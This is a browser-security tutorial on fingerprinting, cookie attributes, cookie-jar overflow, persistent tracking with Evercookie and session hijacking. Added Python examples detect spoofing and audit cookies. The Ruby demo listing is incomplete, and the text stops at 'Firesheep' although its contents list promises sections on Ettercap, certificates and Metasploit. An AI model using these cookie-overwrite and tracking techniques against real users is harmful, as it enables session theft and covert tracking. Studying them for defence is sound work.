
WEB BROWSER ATTACKS

Introduction ...... 4
What is Web Browser? ...... 4
Chrome ...... 6
Apple ...... 7
Enumerating Web Browsers ...... 7
Using HTTP Headers ...... 8
Using DOM Properties ...... 11
What is HTTP/2? ...... 12
Is this actually good? ...... 12
What is an Http Cookie? ...... 14
Why are Cookies of Interest? ...... 14
What is a Cookie jar? ...... 14
Cookie Structure ...... 15
What are Cookie Attributes? ...... 16
Cookie Secure Attribute ...... 16
Cookie Domain/Path Attribute ...... 16
Cookie Expires Attribute ...... 16
Cookie HTTPOnly Attribute ...... 17
Bypassing Path Attribute Restrictions ...... 17
Cookie Jar Overflow ...... 17
Tracking Cookies ...... 22
Session-Hijacking Attacks ...... 23
Bypassing HTTPS ...... 24
Downgrade HTTPS to HTTP using Ettercap filters ...... 24
What is Ettercap? ...... 24
What is MITM? ...... 24
Ettercap Filters? ...... 25
How to hack Certificates ...... 26
Fake Certificates ...... 26
Vulnerabilities in SSL/TLS Layer ...... 27
Attack on browser using Metasploit ...... 28
Exploit with Metasploit ...... 28
Metasploit Browser Autopwn ...... 33
Metasploit IE-10 exploit ...... 35
Reference ...... 38

WEB BROWSER ATTACKS Page 3 of 38

Introduction
Through this mini course, you will learn:

• What a browser is
• Different types of browsers
• How to enumerate web browsers using HTTP headers
• Using DOM properties and working with HTTP cookies
• Why a cookie jar is required in a browser
• Cookie structure and its attributes
• Downgrading HTTPS to HTTP
• How attacks use fake certificates and leverage SSL/TLS vulnerabilities
• How browser-based vulnerabilities can be exploited using Metasploit

What is Web Browser?
A web browser, commonly referred to as a browser, is a software application for retrieving information resources on the World Wide Web. An information resource is identified by a Uniform Resource Identifier/Locator (URI/URL) and may be a web page, image, video or other piece of content. Hyperlinks presented in resources enable users to navigate their browsers easily to related resources. Although browsers are primarily intended for the World Wide Web, they can also be used to access information provided by web servers in private networks or files in file systems. In other words, the browser is a powerful tool through which you access the internet.

The major web browsers are Mozilla Firefox, Google Chrome and Safari, among others.

Mozilla Firefox
Mozilla Firefox, known simply as Firefox, is a free and open-source web browser developed for Windows, OS X and Linux, with a mobile version for Android, by the Mozilla Foundation and its subsidiary, the Mozilla Corporation. Firefox uses the Gecko layout engine to render web pages, which implements current and anticipated web standards.

FIGURE 1: MOZILLA FIREFOX

Google Chrome
Google Chrome is a freeware web browser developed by Google. It used the WebKit layout engine until version 27 and, with the exception of its iOS releases, from version 28 onward uses the WebKit fork Blink. It was first released as a beta version for Microsoft Windows on September 2, 2008, and as a stable public release on December 11, 2008.

FIGURE 2: GOOGLE CHROME BROWSER

Apple Safari
Safari is a web browser developed by Apple Inc. and included with the OS X and iOS operating systems. First released as a public beta on January 7, 2003, on the company's OS X operating system, it became Apple's default browser beginning with Mac OS X v10.3 "Panther". The native browser of iOS is also called Safari, but it has a different graphical user interface (GUI) and uses a different WebKit version and application programming interface (API).

FIGURE 3: APPLE SAFARI

Browsers are always prime targets for attackers. Some browser vendors have already introduced a Bug Bounty Program, which says: "if you are a security researcher or white hat hacker and you think you have found a security vulnerability, report it to us, get a cash reward and have your name added to the Security Hall of Fame". This makes browsers an even more interesting target for hackers. As many users manage their bank accounts online and pay with a credit or debit card, protecting users from online fraud and hacking is mandatory.

In the next section, we will look at how to launch attacks directly against the web browser: how to fingerprint browsers, attack sessions and cookies, attack HTTPS, and many other techniques.

Enumerating Web Browsers
Before exploiting any target, it is good to discover its version and as much other information as you can. A browser fingerprint is information collected about a remote computing device for the purpose of identifying it. Fingerprinting identifies the platform and version of a browser and distinguishes specific browsers such as Mozilla Firefox, Internet Explorer, Opera and Safari. Now that we understand why browser fingerprinting is important, the question is how to do it. Let's have a look at HTTP request headers and DOM properties.

HTTP header fields are components of the header section of request and response messages in the Hypertext Transfer Protocol (HTTP). They define the operating parameters of an HTTP transaction and contain browser information such as the browser name and version. By looking at the DOM properties, you can see what information the browser exposes about the page being viewed. This is a most helpful feature, as it reveals many browser capabilities.

After enumerating the browser, you can investigate how browser bugs can be used to identify a browser. By exploring these features, you can figure out whether the browser is up to date or vulnerable. Information gathered from the browser's User-Agent (UA) header and DOM properties is useful for validating your fingerprinting results. It is also true that the User-Agent header can be spoofed very easily, so it should not always be trusted. To explore this further, please refer to the "Attacks on Plugins" mini course, where I have explained many ways of fingerprinting a browser and its version using plugins.

Using HTTP Headers
HTTP headers are included in every HTTP request and response; they help the browser and the server agree on how information will be transferred, and share information about web pages. Let's take a look at the screenshot below to understand this better.

FIGURE 4: SCREENSHOT OF BROWSER HEADERS OBSERVED AT ECHO.OPERA.COM

You can also determine your browser's HTTP headers by visiting http://echo.opera.com. The first line shows the request method; normally this is GET, POST or HEAD. The second line contains the Host header, which tells the server which domain is being requested. The User-Agent header is the most informative, but also the most easily spoofed header. You can see from the screenshot below that the browser is clearly Firefox, but the User-Agent says Internet Explorer.

FIGURE 5: SCREENSHOT OF FALSE BROWSER HEADERS OBSERVED AT ECHO.OPERA.COM

The remaining headers indicate communication parameters. The Accept header indicates the types of content that the browser will accept in a response, and the Accept-Language header indicates the desired language. The Accept-Encoding header indicates preferences for how to compress the returned data to save bandwidth, and the Connection header value keep-alive indicates that the connection stays open for further requests.

To understand how people actually spoof the User-Agent header, we can install the "User-Agent Switcher" add-on in Mozilla Firefox. This is a widely used add-on for changing or spoofing the User-Agent. Once installed, it typically looks as follows:

FIGURE 6: SCREENSHOT OF DISPLAY INSTALLED USER-AGENT ADD-ON ON MOZILLA FIREFOX

These are typical Firefox browser requests; let's have a look at the request headers in Internet Explorer.

FIGURE 7: SCREENSHOT OF IE BROWSER HEADERS OBSERVED AT ECHO.OPERA.COM

The Host header is first in Mozilla Firefox; in IE 8.9, however, it is closer to the end. The other headers are in the same order, but they come before the User-Agent instead of after it. Changing the position of a header is more difficult than changing the contents of the User-Agent field, so if you see the Host header last, it is a strong indication that the browser is Internet Explorer.

Using DOM Properties
For enumerating the browser version more accurately, the DOM is one of the most reliable methods. The Document Object Model (DOM) is a cross-platform and language-independent convention for representing and interacting with objects in HTML, XHTML and XML documents. The nodes of every document are organized in a tree structure, called the DOM tree. Objects in the DOM tree may be addressed and manipulated by using the methods on those objects. The public interface of a DOM is specified in its application programming interface (API). Other information, ranging from screen resolution to navigation functions, helps developers interact with the browser more easily. As new features are implemented in each release, checking which of them exist lets you enumerate the browser and the version in use.
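The header-order check described above, as an added example (not code from the course): the script parses a raw HTTP/1.x request, reads the browser family the User-Agent claims, derives a second opinion from the position of the Host header (first for Firefox, last for Internet Explorer, as the text states), and flags the request when the two disagree. This is the kind of consistency check a server-side log reviewer or WAF rule would use to spot spoofed User-Agents. Both sample requests are constructed for the example; the first reuses the Firefox User-Agent string shown later on the page.

```python
# Constructed sample requests: the first is ordered the way the page shows for
# Firefox, the second claims to be Firefox but orders its headers like IE.
FIREFOX_REQUEST = (
    "GET / HTTP/1.1\r\n"
    "Host: example.com\r\n"
    "User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:38.0) Gecko/20100101 Firefox/38.0\r\n"
    "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n"
    "Accept-Language: en-US,en;q=0.5\r\n"
    "Accept-Encoding: gzip, deflate\r\n"
    "Connection: keep-alive\r\n\r\n"
)

SPOOFED_REQUEST = (
    "GET / HTTP/1.1\r\n"
    "Accept: text/html, application/xhtml+xml, */*\r\n"
    "Accept-Language: en-US\r\n"
    "User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:38.0) Gecko/20100101 Firefox/38.0\r\n"
    "Accept-Encoding: gzip, deflate\r\n"
    "Connection: Keep-Alive\r\n"
    "Host: example.com\r\n\r\n"
)


def parse_request(raw):
    """Split a raw HTTP/1.x request into (method, ordered list of (name, value))."""
    head = raw.split("\r\n\r\n", 1)[0]
    lines = head.split("\r\n")
    method = lines[0].split(" ", 1)[0]
    headers = []
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers.append((name.strip().lower(), value.strip()))
    return method, headers


def family_from_user_agent(ua):
    """Browser family claimed by the User-Agent string (the easily spoofed signal)."""
    if "Firefox/" in ua:
        return "firefox"
    if "MSIE" in ua or "Trident/" in ua:
        return "ie"
    if "Chrome/" in ua:          # checked before Safari: Chrome's UA also says "Safari/"
        return "chrome"
    if "Safari/" in ua:
        return "safari"
    return "unknown"


def family_from_header_order(headers):
    """Heuristic from the page: Firefox sends Host first, IE sends it near the end."""
    names = [name for name, _ in headers]
    if "host" not in names:
        return "unknown"
    position = names.index("host")
    if position == 0:
        return "firefox"
    if position == len(names) - 1:
        return "ie"
    return "unknown"


def fingerprint(raw):
    """Compare the claimed family with the one implied by header order."""
    method, headers = parse_request(raw)
    user_agent = dict(headers).get("user-agent", "")
    claimed = family_from_user_agent(user_agent)
    observed = family_from_header_order(headers)
    return {
        "method": method,
        "claimed": claimed,
        "observed": observed,
        # Only raise a flag when the order heuristic is conclusive and disagrees
        "suspicious": observed != "unknown" and claimed != observed,
    }


if __name__ == "__main__":
    for label, request in (("firefox", FIREFOX_REQUEST), ("spoofed", SPOOFED_REQUEST)):
        print(label, fingerprint(request))
```

The heuristic is deliberately conservative: a Host header somewhere in the middle yields "unknown" rather than a guess, so the check only fires when the order is a strong signal in the sense the text describes.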

What is HTTP/2?
HTTP/2 (originally named HTTP/2.0), or Hypertext Transfer Protocol version 2, is the second major version of the HTTP network protocol used by the World Wide Web.

Well, look at the address bar in your browser. Yes, HTTP/2 is the successor version of HTTP.

A new version of the reliable and ubiquitous HTTP protocol was recently published as a draft by the organization in charge of creating standards for the Internet, the Internet Engineering Task Force (IETF). This means that the old version, HTTP/1.1, will be replaced by a new one, HTTP/2. This update should improve the way browsers and servers communicate, allowing faster transfer of information while reducing the amount of raw processing power needed.

Is this actually good?
Yes. Currently we are using HTTP/1.1, which was last updated in 1999, quite old stuff. Modern web applications include many different components such as HTML, CSS, JavaScript, images, video and Flash animations. In order to transfer that information, the browser has to create several connections, and each one carries details about the source, destination and contents of the communication. That puts a heavy load on both the server delivering the content and your browser.

Because of the heavy data transfer, the processing power required can lead to slowdowns in application performance. For many companies, such as those in e-commerce, share markets and finance, a slow site can translate directly into lost money, especially for e-commerce services where long load times mean a bad user experience.

Do you know SPDY?
SPDY, pronounced "speedy", is an open networking protocol developed primarily at Google for transporting web content. SPDY manipulates HTTP traffic, with the particular goals of reducing web page load latency and improving web security. SPDY achieves reduced latency through compression, multiplexing and prioritization, although this depends on a combination of network and website deployment conditions. The name "SPDY" is a trademark of Google and is not an acronym.

Google decided to dramatically overhaul HTTP/1.1 and create SPDY; the results have been impressive and, yes, speedy. In plain language, communication between a server and a client (browser) using SPDY is much faster. At a minimum, the transfer speed with SPDY can improve by about 10 percent and, in some cases, can reach numbers closer to 40 percent.

What is a protocol?
A protocol is a set of rules that govern how information is transferred from one computer to another. Every protocol is different, but some things are common to all of them, such as a header, a payload and a footer. The header contains the source and destination addresses, the type of data, the size of the data, and so on. The payload contains the actual information, and the footer holds error-detection information. Some protocols also support a feature called "encapsulation", which lets them carry other protocols inside their payload section.

Is HTTP/2 better?
In layman's terms, HTTP/2 loads web pages much faster, saving everyone time. Simple and short.

HTTP/2 improves speed mainly by creating one persistent connection between the browser and the server, which reduces the amount of data being transferred. Moreover, it transfers data in binary (0 and 1 format), a computer's native language, rather than as plain text, so your computer does not have to translate the information into binary, which saves a good amount of time. HTTP/2 has a feature called "multiplexing" (sending and receiving multiple messages at the same time), uses prioritization so that more important data is transferred first, adds compression, and supports "server push", where a server makes an educated guess about what your next request will be and sends that data ahead of time. Quite impressive and intelligent.

IIS (the Windows web server) already supports HTTP/2 under Windows 10, and it is expected that Apache and other servers will offer support very soon (SPDY is already supported through extensions). This means that soon we will all be using HTTP/2, which will help those who hate slow internet or buffering time.

Is it secure?
Oh yes, it is more secure than the HTTP/1.1 protocol, as HTTP/2 defines the profile of TLS that is required, which includes the version (TLS 1.2), a cipher suite blacklist, and the extensions used.

In an HTTP/2 secure connection, the new ALPN (Application-Layer Protocol Negotiation) extension to the TLS protocol allows the two sides to negotiate HTTP 2.0 support as part of the regular TLS handshake. The client sends the list of protocols it supports (e.g., http/2.0); the server selects one of the advertised protocols and confirms its choice by sending the protocol name back to the client as part of the regular TLS handshake. Establishing an HTTP 2.0 connection over a regular, non-encrypted channel requires a bit more work. Because both HTTP 1.0 and HTTP 2.0 run on the same port (80), in the absence of any other information about the server's support for HTTP 2.0, the client has to use the HTTP Upgrade mechanism to negotiate the appropriate protocol.

What is an HTTP Cookie?
An HTTP cookie, also known as a web cookie, Internet cookie, browser cookie or simply cookie, is a small piece of data sent from a website and stored in a user's web browser while the user is browsing that website. Every time the user loads the website, the browser sends the cookie back to the server to notify the website of the user's previous activity. Because HTTP is a stateless protocol, cookies were designed to be a reliable mechanism for websites to remember stateful information (such as items in a shopping cart) or to record the user's browsing activity (including clicking particular buttons, logging in, or which pages were visited).

Why are Cookies of Interest?
An attacker is always interested in exploiting or stealing a user's valid cookies (a valid HTTP cookie here means a cookie assigned after successful authentication). We will look deeper at cookies and determine why they are so important, how they work, and what they look like as part of web transactions. We will also look at how to abuse cookies as part of more complex browser attacks. Cookies are used for a wide variety of things, such as storing a session identifier (also known as a SessionID) so that the application can identify who you are. They also store session data such as the username, a session token, and a token indicating how long the session stays valid (for session timeout). Cookies can be persistent or non-persistent across sessions: the browser either keeps them across restarts or deletes them as soon as the browser is closed. Stealing cookies means stealing user sessions: an attacker who steals a session can hijack it and perform unauthorized actions, which is known as session hijacking.

What is a Cookie jar?
The "cookie jar" is the area in the browser where all cookies are stored, maintained on behalf of web applications. Cookie jars are the local browser storage area that contains the cookie information as set by web applications. The web application asks the browser to store a piece of information for a specific amount

of time. When the user revisits a page that is in scope for the cookie, the browser typically sends the cookies with every HTTP request. This allows the application to identify a specific user visiting the site. The browser stores each application's cookies separately against the host (the host is the application's domain address, such as example.com).

Cookie Structure
Cookies are transmitted in both directions, from the browser to the web application and vice versa. The browser sends the cookie to the application for the host, and the application sends a Set-Cookie response header, which typically updates the cookie in the cookie jar.

Cookies include:

• Cookie value
• Cookie expiry
• Cookie Path
• Domain the cookie is valid for
• HTTPONLY cookie flag
• SECURE cookie flag, etc.

Let's have a look at where cookies are placed in the HTTP request and HTTP response.

GET / HTTP/1.1
Host: example.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:38.0) Gecko/20100101 Firefox/38.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: ASP.NET_SessionId=grkshoykc4r0syqw5ixldf55; amSessionId=7923333001
Connection: keep-alive

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Length: 9605
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/8.0
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=grkshoykc4r0syqw5ixldf55; path=/; HttpOnly; Secure;
Set-Cookie: amSessionId=7923333001; path=/
X-Powered-By: ASP.NET
Date: Sun, 31 May 2015 12:09:23 GMT

As demonstrated above, cookies are sent as part of the HTTP request in name=value format with a semicolon (;) separator. When cookies are sent by the application, each Set-Cookie gets its own line.

What are Cookie Attributes?
Cookie attributes tell the browser how long the cookie should live, when to send it, which domain or path it belongs to, and some other information. These attributes are sent by the application server with every response. Cookies are primarily used for authentication and maintaining sessions; hence, securing a cookie effectively means securing a user's identity. Cookies can be secured using the following attributes, also known as cookie flags.

• Secure
• Domain and Path
• HTTPOnly
• Expires

Cookie Secure Attribute
If the Secure flag is set on a cookie, the cookie can only be transmitted over an encrypted connection (i.e. HTTPS). This makes the cookie less likely to be exposed to theft via a man-in-the-middle attack, also known as eavesdropping.

Set-Cookie: ASP.NET_SessionId=grkshoykc4r0syqw5ixldf55; Secure;

Cookie Domain/Path Attribute
Both the Domain and Path flags define the scope of the cookie. They tell the browser which website the cookie belongs to. Remember, however, that "Application A" cannot set a cookie for "Application B": for instance, the website example.com cannot set a cookie that has a domain of foo.com.

The Domain attribute defines the domain for which the cookie is valid and with which every request must submit it. If the Domain attribute is not set, the hostname of the server is used as the default value.

The Path attribute defines the URL path for which the cookie is valid. The default Path is '/'.

Set-Cookie: ASP.NET_SessionId=grkshoykc4r0syqw5ixldf55; Domain=httpsecure.org; Path=/;

Cookie Expires Attribute
This attribute tells the browser how long the cookie should stay alive and when it expires or is deleted.

If the Expires attribute is not specified, the cookie stays in the browser's cookie jar for its lifetime.

Set-Cookie: ASP.NET_SessionId=grkshoykc4r0syqw5ixldf55; Expires=Thu, 09-july-2015 00:00:01 GMT;

Cookie HTTPOnly Attribute
The HttpOnly attribute tells the browser not to expose the cookie through channels other than HTTP and HTTPS requests. In other words, the cookie cannot be accessed via JavaScript (using document.cookie). Therefore, an attacker cannot steal the cookie via cross-site scripting.

Set-Cookie: ASP.NET_SessionId=grkshoykc4r0syqw5ixldf55; HttpOnly
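A Set-Cookie audit covering the attributes described above, as an added example (not code from the course): it parses every Set-Cookie header of a response and reports a session cookie that lacks Secure or HttpOnly, or whose Domain attribute widens its scope to all subdomains. The two Set-Cookie lines come from the exchange shown earlier on the page; the remember_me cookie is constructed to exercise the Domain and Expires branches.

```python
# Response headers from the exchange shown on the page, plus one constructed
# "remember_me" cookie that carries Domain and Expires attributes.
SAMPLE_RESPONSE_HEADERS = [
    "HTTP/1.1 200 OK",
    "Cache-Control: no-cache",
    "Set-Cookie: ASP.NET_SessionId=grkshoykc4r0syqw5ixldf55; path=/; HttpOnly; Secure;",
    "Set-Cookie: amSessionId=7923333001; path=/",
    "Set-Cookie: remember_me=abc123; Domain=example.com; Path=/; Expires=Thu, 09 Jul 2015 00:00:01 GMT",
    "X-Powered-By: ASP.NET",
]

# Finding codes and the explanation a reviewer would attach to each.
FINDINGS = {
    "no-secure": "missing Secure: the browser will also send this cookie over plain HTTP",
    "no-httponly": "missing HttpOnly: the value is readable through document.cookie",
    "domain-widens-scope": "Domain attribute set: the cookie is shared with every subdomain",
}


def parse_set_cookie(value):
    """Parse the value of one Set-Cookie header into name, value and attributes."""
    parts = [p.strip() for p in value.split(";") if p.strip()]
    name, _, cookie_value = parts[0].partition("=")
    cookie = {"name": name.strip(), "value": cookie_value.strip(),
              "secure": False, "httponly": False,
              "domain": None, "path": None, "expires": None}
    for attribute in parts[1:]:
        key, _, attr_value = attribute.partition("=")
        key = key.strip().lower()            # attribute names are case-insensitive
        if key == "secure":
            cookie["secure"] = True
        elif key == "httponly":
            cookie["httponly"] = True
        elif key in ("domain", "path", "expires"):
            cookie[key] = attr_value.strip()
    return cookie


def audit_cookie(cookie):
    """Return the finding codes that apply to one parsed cookie."""
    findings = []
    if not cookie["secure"]:
        findings.append("no-secure")
    if not cookie["httponly"]:
        findings.append("no-httponly")
    if cookie["domain"]:
        findings.append("domain-widens-scope")
    return findings


def audit_response(header_lines):
    """Map each cookie name the response sets to its finding codes."""
    report = {}
    for line in header_lines:
        name, sep, value = line.partition(":")
        if sep and name.strip().lower() == "set-cookie":
            cookie = parse_set_cookie(value)
            report[cookie["name"]] = audit_cookie(cookie)
    return report


if __name__ == "__main__":
    for name, codes in audit_response(SAMPLE_RESPONSE_HEADERS).items():
        print(name, "OK" if not codes else "; ".join(FINDINGS[c] for c in codes))
```

Run against the page's own response, the audit passes ASP.NET_SessionId and flags amSessionId on both counts, which is exactly the cookie a sniffer on a plain-HTTP hop would see.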

Bypassing Path Attribute Restrictions
For instance, let's consider an application with two different cookies: the first scoped to http://www.example.com/public and the second scoped to http://www.example.com/private. It seems obvious that a malicious web app on http://www.example.com/public cannot read the http://www.example.com/private cookie, and that the Path attribute should be a security boundary. Right? But you can still bypass it. Remember, the same-origin policy applies to the domain, not to the path. Although document.cookie in the context of a page from either application will not contain the other's cookies, an application can craft a page that contains an iframe which in turn loads a page from the other application. A script in that page can then access the other application's cookie. The browser allows this because both applications are in the same domain.

For instance, iframe snippet code

Cookie Jar Overflow
Cookies are the most important and sensitive part of every application. Today, most applications use cookies to maintain user sessions. The application server sets a cookie in the response, which is stored in the browser's cookie jar. The cookie jar holds many cookies per host. You can modify a cookie via JavaScript only if HttpOnly is not set. Alex Kouzemtchenko and Chris Evans determined that you could overflow the cookie jar to drop older cookies and replace them with your own. Through this, you can control how a user interacts with a site.

Have a look at an example:

    require 'rubygems'
    require 'thin'
    require 'rack'
    require 'sinatra'
    require ''   # the gem name is missing from the original listing

    class CookieDemo < Sinatra::Base
      get "/" do
        link_url = "http://www.google.com"
        if !request.cookies['link_url'] then
          # First visit: store the link target in an HttpOnly cookie
          response.set_cookie "link_url", {:value => link_url, :httponly => true}
        else
          # Later visits: whatever the cookie jar sends back is used as the link target
          link_url = request.cookies['link_url']
        end
        # The page markup (the Secret Login Page link and the two buttons) is not
        # reproduced in the original listing
        'Secret Login Page
    '
      end
    end

    @routes = { "/" => CookieDemo.new }
    @rack_app = Rack::URLMap.new(@routes)
    @thin = Thin::Server.new("example.com", 4000, @rack_app)
    Thin::Logging.silent = true
    Thin::Logging.debug = false
    puts "[#{Time.now}] Thin ready"
    @thin.start

In the above example, the link_url cookie is set when the browser loads the page. When you revisit the page, the cookie is retrieved and the URL is echoed back as the HREF location for the Secret Login Page link; links are rewritten accordingly. In this case, the URL is simply stored in a cookie. When you load the page, you see two buttons: an Attempt Change button and a Spam Cookies button. To explain overflowing the cookie jar more clearly, load the page and hit refresh. When you look at the URL of the link, it reads http://www.google.com, as you can see in the screenshot below. After reloading, it still remains the same.

FIGURE 8: SCREENSHOT: APPLICATION WITH THE DEFAULT LINK

When you click the Attempt Change button shown above, the browser attempts to overwrite the HttpOnly cookie with a new cookie pointing to http://blog.example.com. If you click the button and hit Reload, the link has not changed, as shown in the screenshot below. This is because you cannot overwrite an HttpOnly cookie through JavaScript.

FIGURE 9: SCREENSHOT: ALERT BOX IS DISPLAYED, BUT THE LINK DOESN'T CHANGE.

When you click the Spam Cookies button shown in the screenshot below and then reload the page, the link now points to http://example.com. So how does this work? You overflowed the cookie jar with new cookies, causing the older cookies to be dropped, and then set the link_url cookie again with JavaScript. This makes it the last cookie in the jar and the one presented to Ruby when the page is loaded.


FIGURE 10: SCREENSHOT: THE UPDATED LINK FROM OVERFLOWING THE COOKIE JAR

We have shown how to take an insecure application and target its cookie jar via JavaScript to control how the browser interacts with web pages and targets. This should work in Firefox.
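To make the mechanism and its fix concrete, here is an added simulation (not code from the course and not a browser's real implementation): a toy per-host cookie jar that evicts its oldest cookie when an assumed cap of 50 is exceeded, the three steps of the Ruby demo above replayed against it, and the server-side mitigation of accepting link_url only when it carries an HMAC the server itself produced. The cap, the host, the key and the replacement URL are all constructed for the example.

```python
import hmac
import hashlib
from collections import OrderedDict

# Assumed per-host cap for this simulation; real browsers enforce their own limits.
MAX_COOKIES_PER_HOST = 50
DEFAULT_LINK = "http://www.google.com"
SERVER_KEY = b"constructed-demo-key"   # a real server keeps this in its secret store
HOST = "example.com"


class CookieJar:
    """Toy per-host cookie jar: when a host's limit is exceeded the oldest cookie is evicted."""

    def __init__(self, limit=MAX_COOKIES_PER_HOST):
        self.limit = limit
        self.hosts = {}

    def _store(self, host, name, value, httponly):
        jar = self.hosts.setdefault(host, OrderedDict())
        jar.pop(name, None)                    # re-setting a cookie moves it to the newest slot
        jar[name] = {"value": value, "httponly": httponly}
        while len(jar) > self.limit:
            jar.popitem(last=False)            # drop the oldest cookie for this host

    def set_from_server(self, host, name, value, httponly=False):
        """Set-Cookie response header: the server may mark the cookie HttpOnly."""
        self._store(host, name, value, httponly)

    def set_from_script(self, host, name, value):
        """document.cookie assignment: refused only while an HttpOnly cookie of that name exists."""
        jar = self.hosts.setdefault(host, OrderedDict())
        if name in jar and jar[name]["httponly"]:
            return False
        self._store(host, name, value, httponly=False)
        return True

    def cookie_header(self, host):
        """The Cookie request header the browser would send, oldest cookie first."""
        jar = self.hosts.get(host, {})
        return "; ".join(f"{n}={c['value']}" for n, c in jar.items())


def parse_cookie_header(header):
    """Server-side view of the Cookie header; a later duplicate name wins, as in the Ruby demo."""
    pairs = {}
    for part in header.split(";"):
        name, _, value = part.strip().partition("=")
        if name:
            pairs[name] = value
    return pairs


def sign(value, key=SERVER_KEY):
    """Mitigation: bind the cookie value to a MAC that script in the browser cannot forge."""
    mac = hmac.new(key, value.encode(), hashlib.sha256).hexdigest()
    return f"{value}|{mac}"


def verify(signed, key=SERVER_KEY, default=DEFAULT_LINK):
    """Accept the value only if its MAC checks out; otherwise fall back to the default."""
    value, sep, mac = signed.rpartition("|")
    if not sep:
        return default
    expected = hmac.new(key, value.encode(), hashlib.sha256).hexdigest()
    return value if hmac.compare_digest(mac, expected) else default


def simulate(signed_cookie):
    """Replay the page's three steps and return the link the server ends up using."""
    jar = CookieJar()
    stored = sign(DEFAULT_LINK) if signed_cookie else DEFAULT_LINK
    jar.set_from_server(HOST, "link_url", stored, httponly=True)
    # "Attempt Change": a direct overwrite from script is refused while HttpOnly is in place
    if jar.set_from_script(HOST, "link_url", "http://blog.example.com"):
        raise AssertionError("HttpOnly cookie must not be overwritten directly")
    # "Spam Cookies": filling the jar evicts the oldest cookie, which is link_url
    for i in range(MAX_COOKIES_PER_HOST):
        jar.set_from_script(HOST, f"spam{i}", "x")
    jar.set_from_script(HOST, "link_url", "http://example.com")
    raw = parse_cookie_header(jar.cookie_header(HOST)).get("link_url", DEFAULT_LINK)
    return verify(raw) if signed_cookie else raw


if __name__ == "__main__":
    print("unsigned cookie, link used:", simulate(signed_cookie=False))
    print("signed cookie, link used:  ", simulate(signed_cookie=True))
```

The MAC stops the overflow from changing what the server does, because the only thing script can place in the jar is an unsigned value, which verify() discards. The more fundamental fix is not to let a navigation target live in a client-controlled cookie at all, or to check it against a server-side allowlist before echoing it into a link.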

Tracking Cookies
Tracking cookies are used to track users' web browsing habits. This can also be done to some extent by using the IP address of the computer requesting the page or the Referer field of the HTTP request header, but cookies allow for greater precision. This can be demonstrated as follows:

• If the user requests a page of the site, but the request contains no cookie, the server presumes that this is the first page visited by the user. Therefore, the server creates a unique identifier (typically a string of random letters and numbers) and sends it as a cookie back to the browser together with the requested page.
• From this point on, the cookie will automatically be sent by the browser to the server every time a new page from the site is requested. The server sends the page as usual, but also stores the URL of the requested page, the date/time of the request, and the cookie in a log file.

By analyzing this log file, it is then possible to find out which pages the user has visited, in what sequence, and for how long.
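The two steps above and the log analysis that follows them, as an added example (not code from the course): resolve_tracking_id() is the server-side decision to reuse the id from the Cookie header or mint a fresh one, and sessions() reads back a log in the shape the text describes (URL, timestamp, cookie) to recover each id's page sequence and the seconds spent on each page. The log lines, the cookie name tid and the timestamp format are constructed for the example.

```python
from datetime import datetime
import secrets

TRACKING_COOKIE = "tid"   # assumed name of the tracking cookie

# Constructed log lines in the shape the text describes: requested URL,
# request time and the tracking cookie, one request per line, two visitors.
SAMPLE_LOG = """\
/index.html 2015-05-31T12:00:00 tid=a1b2c3
/index.html 2015-05-31T12:00:05 tid=z9y8x7
/products.html 2015-05-31T12:00:40 tid=a1b2c3
/about.html 2015-05-31T12:01:00 tid=z9y8x7
/cart.html 2015-05-31T12:02:10 tid=a1b2c3
"""


def resolve_tracking_id(cookie_header):
    """Server side of step one: reuse the id from the Cookie header, or mint a new one.

    Returns (id, is_new)."""
    for part in cookie_header.split(";"):
        name, _, value = part.strip().partition("=")
        if name == TRACKING_COOKIE and value:
            return value, False
    return secrets.token_hex(8), True          # random identifier for a first visit


def parse_log(text):
    """Turn log lines into (id, url, datetime) records."""
    records = []
    for line in text.splitlines():
        if not line.strip():
            continue
        url, stamp, cookie = line.split()
        tracking_id = cookie.partition("=")[2]
        records.append((tracking_id, url, datetime.fromisoformat(stamp)))
    return records


def sessions(text):
    """Per tracking id: pages in visit order with seconds spent on each.

    Time spent is the gap until the same id's next request; None for the last page seen."""
    by_id = {}
    for tracking_id, url, when in sorted(parse_log(text), key=lambda r: r[2]):
        by_id.setdefault(tracking_id, []).append((url, when))
    result = {}
    for tracking_id, visits in by_id.items():
        trail = []
        for i, (url, when) in enumerate(visits):
            if i + 1 < len(visits):
                spent = int((visits[i + 1][1] - when).total_seconds())
            else:
                spent = None
            trail.append((url, spent))
        result[tracking_id] = trail
    return result


if __name__ == "__main__":
    for tracking_id, trail in sessions(SAMPLE_LOG).items():
        print(tracking_id, trail)
```

The "for how long" figure is only an upper bound on attention: the gap before the next request includes any time the tab sat idle, which is why real analytics pair it with client-side beacons.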

Using JavaScript, tracking user activity is quite an easy task. You can do it using the snippet below:

    // Convert a number of days to milliseconds for the expiry calculation
    function daysInMilliseconds(days) { return days * 24 * 60 * 60 * 1000; }
    // Persist the cookie for five days
    var exp = new Date(new Date().getTime() + daysInMilliseconds(5)).toGMTString();
    document.cookie = "link_url=http://example.com;expires=" + exp;

Alternatively, you can Google it to find more. The code above persists across browser crashes for the engagement window, which in this case is five days. If you want to track users for longer periods of time, then the Evercookie project is best for you. For simple tracking, Evercookie makes deleting cookies very difficult for the target.

About Evercookie: evercookie is a JavaScript API that produces extremely persistent cookies in a browser. Its goal is to identify a client even after they have removed standard cookies, Flash cookies (Local Shared Objects or LSOs), and others.

evercookie accomplishes this by storing the cookie data in several types of storage mechanisms that are available in the local browser. Additionally, if evercookie finds that the user has removed any of the types of cookies in question, it recreates them using each mechanism available.

Visit http://samy.pl/evercookie/ to learn more about Evercookie.

Session-Hijacking Attacks
HTTP session hijacking is a method of impersonating another user by stealing their session. An attacker can sniff a user's session ID or cookies via a MITM (man-in-the-middle) attack. By stealing a valid session ID, an attacker can easily perform unauthorized actions, because the application believes it is dealing with the legitimate user. Though session impersonation attacks have been around for a while, they became a big deal after the release of Firesheep.

Firesheep
